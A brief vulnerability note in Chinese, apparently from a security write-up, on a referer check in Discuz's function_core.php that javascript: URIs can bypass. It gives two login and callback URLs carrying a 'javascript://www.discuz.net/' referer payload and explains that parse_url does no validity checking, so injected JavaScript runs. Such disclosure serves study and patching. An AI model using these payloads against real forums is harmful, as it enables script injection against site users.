member.php?mod=logging&action=login&referer=javascript://www.discuz.net/
connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/
source/function/function_core.php:
这段代码使用 parse_url 解析 referer 后得到的 host 与 $_SERVER['HTTP_HOST'] 进行对比判断是否为站内,但由于这个函数本身是不做有效性检测的,所以使用 js URI 就可以绕过域检测执行 JS了。